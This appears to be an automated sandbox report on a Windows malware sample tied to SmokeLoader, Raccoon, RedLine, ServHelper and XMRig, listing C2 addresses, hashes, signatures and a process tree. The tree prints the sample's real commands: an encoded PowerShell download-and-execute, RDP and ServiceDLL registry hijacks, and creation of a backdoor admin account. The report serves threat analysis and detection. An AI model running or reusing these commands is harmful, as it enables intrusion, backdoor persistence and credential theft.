Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-10-2021 13:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe

  • Size

    175KB

  • MD5

    75c57c36ea55cae6e61d3de271003217

  • SHA1

    999f8eeefdbefa74f9cf14e7447ddace4b04e293

  • SHA256

    6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf

  • SHA512

    cdf331578a6016371e7b2fd3b2cb96abbd0537a6288c326e41acd8b3308a706ba1a2f78bee6067ed0094f789493e8ac9f783979151f6d49880e185af8f6f7e89

Score
10/10
raccoonredlineservhelpersmokeloaderxmrig27d80aa27e80cd2ef63c638e2752e24242d1b37cmegaprolivw1backdoordiscoveryinfostealerminerpersistencespywarestealersuricatatrojanupxvmprotect

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Extracted

Family

redline

Botnet

MegaProliv

C2

93.115.20.139:28978

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 5 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Executes dropped EXE 8 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe
    "C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:504
    • C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe
      "C:\Users\Admin\AppData\Local\Temp\6edcffc2f25c436812d212ae7dcca1e5ff85fffbc3ba9e1b2c4529e4b00584bf.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2708
  • C:\Users\Admin\AppData\Local\Temp\C5E6.exe
    C:\Users\Admin\AppData\Local\Temp\C5E6.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ypmd11p\4ypmd11p.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF245.tmp" "c:\Users\Admin\AppData\Local\Temp\4ypmd11p\CSC8FA6497565B24962A0C859D862A90E.TMP"
          4⤵
            PID:2580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3576
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
            PID:2568
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            3⤵
              PID:960
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              3⤵
              • Modifies registry key
              PID:3408
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              3⤵
                PID:3236
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2884
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  4⤵
                    PID:1912
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  3⤵
                    PID:3180
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start rdpdr
                      4⤵
                        PID:1476
                        • C:\Windows\system32\net.exe
                          net start rdpdr
                          5⤵
                            PID:3584
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 start rdpdr
                              6⤵
                                PID:2432
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                          3⤵
                            PID:4068
                            • C:\Windows\system32\cmd.exe
                              cmd /c net start TermService
                              4⤵
                                PID:2124
                                • C:\Windows\system32\net.exe
                                  net start TermService
                                  5⤵
                                    PID:4024
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 start TermService
                                      6⤵
                                        PID:3556
                                • C:\Windows\system32\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                  3⤵
                                    PID:2060
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                    3⤵
                                      PID:2884
                                • C:\Users\Admin\AppData\Local\Temp\CC4F.exe
                                  C:\Users\Admin\AppData\Local\Temp\CC4F.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:1852
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 980
                                    2⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:2888
                                • C:\Users\Admin\AppData\Local\Temp\D2B9.exe
                                  C:\Users\Admin\AppData\Local\Temp\D2B9.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2820
                                • C:\Users\Admin\AppData\Local\Temp\DE05.exe
                                  C:\Users\Admin\AppData\Local\Temp\DE05.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3168
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                    2⤵
                                    • Drops file in System32 directory
                                    • Drops file in Windows directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:816
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffsqzohs\ffsqzohs.cmdline"
                                      3⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3460
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16F4.tmp" "c:\Users\Admin\AppData\Local\Temp\ffsqzohs\CSCE7A0BCCA9C5043FFAC857F79D8DD5F0.TMP"
                                        4⤵
                                          PID:3604
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3268
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        3⤵
                                          PID:3548
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                          3⤵
                                            PID:2044
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                            3⤵
                                              PID:960
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                              3⤵
                                              • Modifies registry key
                                              PID:3988
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                              3⤵
                                                PID:788
                                              • C:\Windows\SysWOW64\net.exe
                                                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                3⤵
                                                  PID:1912
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                    4⤵
                                                      PID:2876
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                    3⤵
                                                      PID:2700
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c net start rdpdr
                                                        4⤵
                                                          PID:2836
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net start rdpdr
                                                            5⤵
                                                              PID:1872
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 start rdpdr
                                                                6⤵
                                                                  PID:3872
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                            3⤵
                                                              PID:1132
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c net start TermService
                                                                4⤵
                                                                  PID:3880
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net start TermService
                                                                    5⤵
                                                                      PID:2664
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 start TermService
                                                                        6⤵
                                                                          PID:2580
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                    3⤵
                                                                      PID:3848
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                      3⤵
                                                                        PID:1844
                                                                  • C:\Users\Admin\AppData\Local\Temp\E44F.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\E44F.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3196
                                                                    • C:\Users\Admin\AppData\Local\Temp\E44F.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\E44F.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2884
                                                                  • C:\Windows\System32\cmd.exe
                                                                    cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                    1⤵
                                                                      PID:2664
                                                                      • C:\Windows\system32\net.exe
                                                                        net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                        2⤵
                                                                          PID:2544
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                            3⤵
                                                                              PID:3560
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd /C net.exe user WgaUtilAcc 9IT1wUoS /add
                                                                          1⤵
                                                                            PID:2168
                                                                            • C:\Windows\system32\net.exe
                                                                              net.exe user WgaUtilAcc 9IT1wUoS /add
                                                                              2⤵
                                                                                PID:3180
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 user WgaUtilAcc 9IT1wUoS /add
                                                                                  3⤵
                                                                                    PID:3872
                                                                              • C:\Windows\System32\cmd.exe
                                                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                1⤵
                                                                                  PID:4060
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                    2⤵
                                                                                      PID:900
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                        3⤵
                                                                                          PID:3176
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                      1⤵
                                                                                        PID:1512
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                          2⤵
                                                                                            PID:3592
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                              3⤵
                                                                                                PID:2576
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                            1⤵
                                                                                              PID:680
                                                                                              • C:\Windows\system32\net.exe
                                                                                                net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                2⤵
                                                                                                  PID:4072
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                    3⤵
                                                                                                      PID:804
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  cmd /C net.exe user WgaUtilAcc 9IT1wUoS
                                                                                                  1⤵
                                                                                                    PID:3180
                                                                                                    • C:\Windows\system32\net.exe
                                                                                                      net.exe user WgaUtilAcc 9IT1wUoS
                                                                                                      2⤵
                                                                                                        PID:3584
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 user WgaUtilAcc 9IT1wUoS
                                                                                                          3⤵
                                                                                                            PID:3560
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        cmd.exe /C wmic path win32_VideoController get name
                                                                                                        1⤵
                                                                                                          PID:2716
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic path win32_VideoController get name
                                                                                                            2⤵
                                                                                                              PID:1980
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd.exe /C wmic CPU get NAME
                                                                                                            1⤵
                                                                                                              PID:2576
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic CPU get NAME
                                                                                                                2⤵
                                                                                                                  PID:2976
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                1⤵
                                                                                                                  PID:1564
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                    2⤵
                                                                                                                      PID:3756
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                        3⤵
                                                                                                                        • Blocklisted process makes network request
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:2124
                                                                                                                  • C:\Users\Admin\AppData\Roaming\cbtfvtu
                                                                                                                    C:\Users\Admin\AppData\Roaming\cbtfvtu
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:2968
                                                                                                                    • C:\Users\Admin\AppData\Roaming\cbtfvtu
                                                                                                                      C:\Users\Admin\AppData\Roaming\cbtfvtu
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:3808

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • memory/504-115-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                    Download

                                                                                                                  • memory/504-114-0x0000000000651000-0x000000000065B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                    Download

                                                                                                                  • memory/816-257-0x0000000006A30000-0x0000000006A31000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/816-313-0x0000000006A33000-0x0000000006A34000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/816-259-0x0000000006A32000-0x0000000006A33000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1616-260-0x000001E2E4380000-0x000001E2E4382000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1616-261-0x000001E2E4383000-0x000001E2E4385000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1616-294-0x000001E2E4386000-0x000001E2E4388000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1616-322-0x000001E2E4388000-0x000001E2E438A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1676-141-0x0000023472F95000-0x0000023472F96000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1676-142-0x0000023472F96000-0x0000023472F97000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1676-137-0x0000023472F90000-0x0000023472F92000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1676-138-0x0000023472F93000-0x0000023472F95000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1676-130-0x0000023473E10000-0x000002347420F000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.0MB

                                                                                                                    Download

                                                                                                                  • memory/1676-122-0x0000000000360000-0x00000000011A6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    14.3MB

                                                                                                                    Download

                                                                                                                  • memory/1840-176-0x00000121C82F3000-0x00000121C82F5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-179-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-222-0x00000121C82F8000-0x00000121C82F9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-227-0x00000121C97F0000-0x00000121C97F1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-170-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-172-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-171-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-173-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-175-0x00000121C82F0000-0x00000121C82F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-178-0x00000121C8430000-0x00000121C8431000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-223-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-189-0x00000121C82F6000-0x00000121C82F8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-208-0x00000121C8580000-0x00000121C8581000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-188-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-180-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-182-0x00000121C85E0000-0x00000121C85E1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-184-0x00000121B0020000-0x00000121B0022000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/1840-228-0x00000121C9B80000-0x00000121C9B81000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1852-132-0x0000000002510000-0x00000000025A1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    580KB

                                                                                                                    Download

                                                                                                                  • memory/2044-1032-0x0000000007182000-0x0000000007183000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/2044-1031-0x0000000007180000-0x0000000007181000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/2044-1075-0x000000007E0D0000-0x000000007E0D1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/2124-1319-0x00000137E9698000-0x00000137E9699000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/2124-1147-0x00000137E9696000-0x00000137E9698000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2124-1078-0x00000137E9693000-0x00000137E9695000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2124-1076-0x00000137E9690000-0x00000137E9692000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2224-118-0x0000000000AD0000-0x0000000000AE6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    88KB

                                                                                                                    Download

                                                                                                                  • memory/2224-1491-0x0000000000B00000-0x0000000000B16000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    88KB

                                                                                                                    Download

                                                                                                                  • memory/2568-416-0x000001CCD1D63000-0x000001CCD1D65000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2568-415-0x000001CCD1D60000-0x000001CCD1D62000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2568-448-0x000001CCD1D68000-0x000001CCD1D6A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/2568-447-0x000001CCD1D66000-0x000001CCD1D68000-memory.dmp

                                                                                                                    Filesize

